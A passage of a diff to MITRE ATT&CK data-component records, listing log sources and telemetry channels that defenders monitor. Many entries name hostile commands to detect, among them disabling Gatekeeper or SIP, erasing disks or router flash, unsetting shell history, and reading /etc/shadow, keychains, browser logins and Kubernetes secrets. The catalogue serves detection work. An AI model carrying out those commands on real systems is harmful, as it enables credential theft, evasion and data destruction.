+                            "name": "esxi:shell",
+                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "boot logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "DCUI shell start, BusyBox activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli system account add"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unexpected restarts of management agents or shell access"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli, vim-cmd invocation"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "shell session start"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "vCenter Management"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file system activity monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "access to BPF devices or interface IOCTLs"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "process execution involving curl, grep, or awk on secrets"
+                        },
+                        {
+                            "name": "linus:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Shell history logs"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Terminal Command History"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "/home/*/.bash_history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Command-line includes base64 -d or openssl enc -d"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events.command_line"
+                        },
+                        {
+                            "name": "linux:shell",
+                            "channel": "Manual invocation of software enumeration commands via interactive shell"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "cron activity"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Suspicious script or command execution targeting browser folders"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Sudo or root escalation followed by filesystem mount commands"
+                        },
+                        {
+                            "name": "linuxsyslog",
+                            "channel": "nslcd or winbind logs"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "Activity Log: Command Invocation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Get-RoleGroup, Get-DistributionGroup"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Startup execution includes non-default component"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Execution of unsigned macro from template"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Automated forwarding or file sync initiated by a logic app"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, New-InboxRule"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Interpreter exec with suspicious arguments as above"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd + process_events"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "system.log"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "/var/log/system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security-agent detection or enumeration commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or SetFile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "profiles install -type=configuration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "nohup, disown, or osascript execution patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of 'profiles install -type=configuration'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:com.apple.Terminal"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 or curl processes chained within short execution window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DS daemon log entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pwpolicy|PasswordPolicy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line contains smbutil view //, mount_smbfs //"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log messages related to disk enumeration context or Terminal session"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults write com.apple.system.logging or logd manipulation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process calling security find-certificate, export, or import"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of launchctl load/unload/start commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 -d or osascript invoked on staged file"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "grep/cat on files matching credential patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: at, job runner"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of dscl . create with IsHidden=1"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr utility execution with -w or -p flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load or boot-time plist registration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kextload execution from Terminal or suspicious paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or setfile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn, process:exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "csrutil disable"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'process == <utility>'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Set or unset HIST* variables in shell environment"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load/unload or plist file modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl . -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Policy Update"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "ip ssh pubkey-chain"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase startup-config, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "cmd: cmd=show clock detail"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "format flash:, format disk, reformat commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase nvram:, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Interface commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "shell command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Commands like 'no logging' or equivalents that disable session history"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "PKI export or certificate manipulation commands"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
+                        },
+                        {
+                            "name": "networkdevice:Firewall",
+                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Command Audit / Configuration Change"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "eventlog"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command_exec"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "system boot logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "exec command='monitor capture'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging buffered, no aaa new-model, disable firewall"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "interactive shell logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command sequence: erase \u2192 format \u2192 reload"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privilege-level command execution"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Detected CLI command to export key material"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "reload command issued"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "syslog facility LOCAL7 or trap messages"
+                        },
+                        {
+                            "name": "saas:PRMetadata",
+                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Unexpected DLL or component loaded at Office startup"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Office application warning or alert on macro execution from template"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
+                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Get-ADTrust|GetAllTrustRelationships"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CommandLine=copy-item or robocopy from UNC path"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Exchange Cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CmdletName: Get-Recipient, Get-User"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell without -NoProfile flag"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4101"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-24 19:47:16.123000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0055",
+                            "external_id": "DC0055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Access",
+                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "macOS:unifiedlog",
+                            "channel": "looking for file access to scripts with abnormal encoding patterns"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "KeyChain/AndroidKeyStore read of token alias"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/proc/*/mem read attempt"
+                        },
+                        {
+                            "name": "auditd:FS",
+                            "channel": "read: File access to /proc/modules or /sys/module/"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, or stat of browser config files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, flock, fcntl, unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Unusual processes accessing or modifying cookie databases"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH records referencing /dev/video*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Processes reading credential or token cache files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive file directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive config or secret files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read access to ~/.bash_history"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or read to browser cookie storage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, mount"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories (/etc, /home/*)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
+                        },
+                        {
+                            "name": "CloudTrail:GetObject",
+                            "channel": "sensitive credential files in buckets or local image storage"
+                        },
+                        {
+                            "name": "desktop:file_manager",
+                            "channel": "nautilus, dolphin, or gvfs logs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "container_file_activity"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "open/read on secret mount paths"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "read: Access to sensitive log files by non-admin users"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore/log file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "vSphere File API Access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "file copy or datastore upload via HTTPS"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "guest OS outbound transfer logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS access logs"
+                        },
+                        {
+                            "name": "esxis:vmkernel",
+                            "channel": "Datastore Access"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating access to system configuration files and environmental information sources"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File Access Monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Disk Activity Tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem activity"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Call Monitoring"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "read/write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open for known browser cookie paths"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file reads/writes from /Volumes/"
+                        },
+                        {
+                            "name": "fs:quarantine",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Write operations to storage"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "/proc/*/maps access"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "auth.log or custom tool logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "/var/log/syslog"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, MailboxAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open or read syscall to ~/.bash_history"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open, es_event_exec"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "Access to Keychain DB or system.keychain"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "~/Library/Keychains, /Library/Keychains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
